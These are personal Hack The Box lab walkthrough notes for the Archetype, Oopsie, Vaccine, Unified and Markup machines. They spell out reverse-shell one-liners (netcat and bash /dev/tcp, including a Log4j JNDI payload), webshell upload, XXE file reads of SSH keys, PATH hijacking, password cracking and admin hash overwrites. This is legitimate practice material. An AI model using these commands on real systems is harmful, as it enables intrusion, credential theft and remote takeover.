[Back](../HTBMachines.md)

# Table of Contents:

- [Archetype](#archetype)
- [Oopsie](#oopsie)
- [Vaccine](#vaccine)
- [ ] [Unified](#unified)
- [Markup](#markup)
- [ ] [Base](#base)

>[!attention] Insights
> - Always check privileges and file type

# Archetype

- list shares on SMB and connect to non-Administrative
- read available file
- connect via impacket-mssqlclient
    >[!note] Without the `-windows-auth` optional argument our connection will not work

>[!help] Helpful links:
> - [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server)
> - [extended stored procedure to spawn a Windows command shell](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16)
> - [Configure xp_cmdshell](https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16)
> - [PEAS-ng](https://github.com/peass-ng/PEASS-ng)

### Reverse shell

- after enabling `xp_cmdshell` on server (`enable_xp_cmdshell`)
- download netcat executable: `xp_cmdshell "powershell -c cd C:\Users\user\Downloads; wget https://raw.githubusercontent.com/int0x33/nc.exe/blob/master/nc.exe -outfile nc.exe`
- run netcat on your machine and on the target machine: `xp_cmdshell "powershell -c cd C:\Users\user\Downloads; .\nc.exe -e cmd.exe <your_ip> <port>"`
- download [PEAS-ng files](https://github.com/peass-ng/PEASS-ng/releases/tag/20241101-6f46e855) to the target (or copy from `/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe`):
    - from your machine: `sudo python3 -m http.server 80`
    - on the target machine: `wget http://<your_ip>/winPEASx64.exe -outfile winpeas.exe`
- AND winPEASx64.exe GIVES ME NOTHING!
- so just search credentials in PowerShell history: `\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`
- explanation from [here](https://bros10.github.io/posts/Archetype/)

>[!cite] Explanation
> from [here](https://bros10.github.io/posts/Archetype/)
> "After doing a bit of enumeration I found the C:/backups folder which was the SMB share, there’s a chance that the Administrator created that backup using a command called net. When using the net command as a non-admin user you’ve got to provide the Administrator username and Password to allow you to create a network share. Therefore in the PowerShell history file their command may have been saved and we could obtain credentials through that way."

# Oopsie

>[!note] Notes from official HTB writeup

1. nmap the target
2. intercept using *BurpSuite* "Login as Guest" traffic
3. change `id` in url to `id=1`
4. change cookies to admin
5. upload `php-reverse-shell.php` from `/usr/share/webshells/`
6. bruteforce directories with `gobuster`
7. run netcat: `nc -lvnp 1234`
8. request downloaded reverse shell from browser: `http://<target_ip>/uploads/php-reverse-shell.php`
9. spawn functional shell: `python3 -c 'import pty;pty.spawn("/bin/bash")'`
10. in Apache directory search for legit password
11. switch to user: `su <username>`
12. check the basic commands for elecvating privileges(sudo, id): `sudo -l`
13. find binaries related to *bugtracker* group: `find / -group bugtracker`
14. check file type and permissions: `file <file_name> && ls -la <file_name>`
15. run binary

### Executing binaries as root

- create file in `/tmp` with `/bin/sh` and make it executable
- add `/tmp` directory to PATH: `export PATH=/tmp:$PATH`
- check for success: `echo $PATH`
- run binary

# Vaccine
- nmap
- `ftp` to target and get `backup.zip`

### Cracking
- get hash: `zip2john backup.zip > ziphash`
- crack: `john -wordlist=/usr/share/wordlists/rockyou.txt ziphash`
- save hash which find in zipped files
- crack hash: `hashcat -a 0 -m 0 <passwdhash> /usr/share/wordlists/rockyou.txt`





# Unified

- enumerate: `sudo nmap -sVC -T4 -Pn --open -p- <target_ip> -oN <filename>`
- google *UniFy 6.4.54 exploit*
- [What’s Going on With Log4j?](https://www.hackthebox.com/blog/Whats-Going-On-With-Log4j-Exploitation)
- intercept 'Login' `POST` request and send to repeater

>[!note]
> - JNDI - Java Naming and Directory Interface API
> - LDAP - Lightweight Directory Access Protocol (port 389)

### Exploitation

>[!hint] Payload
> `echo "bash -c bash -i >&/dev/tcp/<your_ip>/<port> 0>&1" | base64`
> `java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<hash>}|{base64,-d}|{bash,-i}" --hostname "<your_tun>"`

>[!attention] DON'T use spaces between pipes!

- make shell more interactive `script /dev/null -c bash`
- get user flag
- `cat /etc/passwd` gives us *mongodb user*
- `ps aux | grep mongodb` gives us *mongodb process and port*

### Privileges Escalation

>[!note] Default database name for the UniFi application is ace
> Payload:
> `mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"`

- `$6$` - sha512 default identifier
- generate new password hash: `mkpasswd -m sha-512 Password1!`
- update administrator password hash: `mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"SHA_512 Hash Generated"}})'`
- login with new password
- find root password
- ssh as root


# Markup

- enum machine (`masscan` faster for UDP scan)
- login via default admin credentials or bruteforce (`ffuf`, BurpSuite etc.)
- intercept 'Order' submit

>[!note] XML Payload
> [hacktricks](https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity)
> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]><item>&test;</item>
> you may want to bruteforce pathes with *BurpSuite Intruder*

>[!hint] Findings from `<head></head>`
> *Modified by Daniel*

- modify payload related to findings
- `(file:///)c:/users/daniel/.ssh/id_rsa`
- save into file and change permissions to `400` (Permissions `****` for 'id_rsa' are too open.)
- ssh to machine
- check privileges and permissions: `whoami /priv`
- seek for uncommon directory
- `icacls job.bat`

### Privileges Escalation

- run netcat on your machine
- exploit:
```cmd
echo C:\Log-Management\nc64.exe -e cmd.exe {your_IP} {port} > C:\Log-
Management\job.bat
```

>[!attention]
> - Make sure you are not running the echo  command from PowerShell.
> - many attempts might lead to failure
> - exploit should be run multiple times until it becomes successful

# Base

